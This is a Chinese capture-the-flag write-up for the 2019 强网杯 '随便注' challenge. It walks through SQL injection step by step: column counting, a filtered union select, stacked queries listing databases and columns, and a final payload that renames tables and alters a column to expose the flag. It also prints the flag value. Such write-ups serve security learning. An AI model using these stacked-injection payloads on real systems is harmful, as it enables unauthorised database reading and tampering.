【强网杯2019】随便注

题目：

由题目信息可得出，采用SQL注入；

首先判断闭合符号，输入1’ 发现报错了，用**#**截断

那么存在注入漏洞，接下来查询字段数，**1’ order by 3#**发现报错了

**1’ order by 2#**则显示正常，那么字段数为两个；
联合查询：1’ union select 1,2#
select，update，…都被过滤掉了；
堆叠注入：又叫多语句注入,就是原本只执行一个sql句,用函数让他可以执行多个sql语句。
我们继续查询数据库：1’;show databases;#
接下来查询字段

此时发现存在‘1919810931114514’和‘words’这两个字段。

查询这两个字段中的列名：

1’; show columns form ‘words’

1’; show columns form 1919810931114514
这里要注意使用反引号。

发现words里边存在id 和data，flag则在1919810931114514里边，但没法显示出来；（我们要的东西都在words中回显出来了）即我们若想得到flag，就需要：
（1）将字段words换为其他的，如word1
（2）将字段1919810931114514换为words
（3）将列名flag换为id
需要使用alter，rename等关键字, 如下：

1’ ; rename tables words to word1 ; rename tables 1919810931114514 to words ; alter table words change flag id varchar(100);#

这样就改变了数据库结构，

1’ or 1=1#

得到flag{37c18514-62c1-4d17-b3e9-72e9876d7d6f}

本题涉及了rename ， alter ，这两个关键字：

rename：重命名
alter：变更列

对数据库结构改变的简单语句：

CREATE DATABASE - 创建新数据库
ALTER DATABASE - 修改数据库
CREATE TABLE - 创建新表
ALTER TABLE - 变更（改变）数据库表
DROP TABLE - 删除表
CREATE INDEX - 创建索引（搜索键）
DROP INDEX - 删除索引